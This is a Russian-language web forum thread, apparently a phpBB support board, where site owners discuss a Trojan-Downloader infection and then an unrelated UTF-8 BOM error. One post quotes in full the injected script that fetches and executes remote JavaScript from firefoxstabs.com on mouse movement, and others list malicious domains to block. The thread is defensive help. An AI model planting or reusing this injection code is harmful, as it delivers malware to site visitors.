Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[MIT]

Айдар
Смотри ванимательнее. С Гугла качается только jQuery, а вот что качается со второго сайта — очень интересно.

Добавлено спустя 17 минут 2 секунды:
Пока сайт распростанителей не попал в базу антивирусов, добавьте в фаерволл адреса:
firefoxstabs.com
ibankk.com
c9jv.co.cc

[kusto]

не знаю, сайты гугла, не гугла, но пока я его не вычистил из всех файлов, датирующихся 30 марта (именно с 30 марта начались проблемы), форум не начал корректно работать. Что харрактерно, на сайт этот код тоже "залез", пришлось вычищать его еще и с сайта. Сайт, правда работал без видимых каких-либо побочных еффектов, просто яндекс выдал в вебмастере, что на сайте присутствует вредоносный код. Такие вот дела. Еще раз спасибо вашему форуму за полезную информацию.

[Sheer]

На Гугл, да, к библиотеке jQuery, а вот http://firefoxstabs.com подозрительно. Отправляет на порт 80, требует логин и пасс... Дальше я не полез... стремно.

[MIT]

Не лезь дальше. Там довольно серьёзная пакость лежит.

[olibia]

таже фигня...замучила совсем уже, раз в неделю кладет такую строчку

Код: Выделить всё

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

на главную страницу вконце после тега

Код: Выделить всё

</html>

... меняла пароли, чистила комп, хостинг вроде вдоль и поперек проверили... где может лежать эта тварь?!!!

[Sheer]

хостинг вроде вдоль и поперек проверили

Пусть проверят на наличие Blackhole Exploit Kit

[VeroLom]

Нашёл более эффективный скрипт для лечения от этого вируса. Вылечил сайты на битриксе и UMI.
http://www.0xff.su/

[force]

не вводите людей в заблуждение. скрипт не лечит от вируса. он просто ищет файлы с вредоносным кодом и выкидывает код. но если комп заражен, то через день-два код пропишется снова в тех же файлах.
в настоящий момент сайт вирусописателя заблокирован, вирь ничего не прописывает. но как только будет запущен новый сайт с вирем, через те же дырки все повторится заново

[VeroLom]

1. Качаете и запускаете из корня сайта скрипт с http://www.0xff.su/0x0005
2. Меняете все пароли

[Mileno4ka]

Доброго времени суток.
Помогите, пожалуйста, с проблемой.

Сегодня утром при заходе на форум : http://vertex-spb.ru/forum/ заметила 2 проблемы:

1. Шрифт стал огромным на странице
2. Строки ошибок в "шапке" страницы

см. Вложение 1

Никакие настройки не меняла.

При этом форум работал.

После обеда при попытки перейти с главной страницы форума на страницу ввода логина и пасса он начал выдавать тоже ошибку

см. Вложение 2

Таким образом: на форум не войти.

Первым делом оставила запрос Петерхосту:

От кого: Peterhost Support Team <support@peterhost.ru>
Дата: 8 августа 2011 г.

По поводу возникающей ошибки обратитесь, пожалуйста, к Вашему
веб-разработчику.

[MAzZY]

UTF-8 w/o BOM

[Mileno4ka]

??? Непоняяятно (с)

[Sheer]

Mileno4ka
Пересохраните файлы index.php и config.php в кодировке UTF-8 без BOM
http://www.phpbbguru.net/community/sear ... %D0%B7+BOM

[Пчелкин]

Никакие настройки не меняла.

Когда и где имеется ввиду..и при чем тут настройки...что делалось на фтпи?
Само все происходить не может...

[Mileno4ka]

В том то и дело, что вообще ничего не трогала. Пользовалась только как пользователь форумом. Даже в админку не заходила, не говоря уж об фтп.

Добавлено спустя 39 минут 50 секунд:
Преобразовала в UTF-8 без BOM в notepad++. заменила оригиналы. не помогло.